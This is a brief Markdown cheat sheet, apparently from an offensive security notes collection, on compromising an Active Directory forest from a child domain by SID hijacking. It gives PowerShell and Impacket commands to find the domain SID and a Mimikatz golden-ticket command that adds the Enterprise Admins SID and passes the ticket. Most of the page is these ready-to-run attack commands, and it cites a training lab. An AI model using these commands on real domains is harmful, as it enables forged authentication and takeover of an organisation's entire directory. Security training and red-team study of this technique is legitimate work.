25 lines
891 B
Markdown
25 lines
891 B
Markdown
# Child Domain to Forest Compromise - SID Hijacking
|
|
|
|
Most trees are linked with dual sided trust relationships to allow for sharing of resources.
|
|
By default the first domain created if the Forest Root.
|
|
|
|
**Requirements**:
|
|
- KRBTGT Hash
|
|
- Find the SID of the domain
|
|
```powershell
|
|
$ Convert-NameToSid target.domain.com\krbtgt
|
|
S-1-5-21-2941561648-383941485-1389968811-502
|
|
|
|
# with Impacket
|
|
lookupsid.py domain/user:password@10.10.10.10
|
|
```
|
|
- Replace 502 with 519 to represent Enterprise Admins
|
|
- Create golden ticket and attack parent domain.
|
|
```powershell
|
|
kerberos::golden /user:Administrator /krbtgt:HASH_KRBTGT /domain:domain.local /sid:S-1-5-21-2941561648-383941485-1389968811 /sids:S-1-5-SID-SECOND-DOMAIN-519 /ptt
|
|
```
|
|
|
|
|
|
## References
|
|
|
|
* [Training - Attacking and Defending Active Directory Lab - Altered Security](https://www.alteredsecurity.com/adlab) |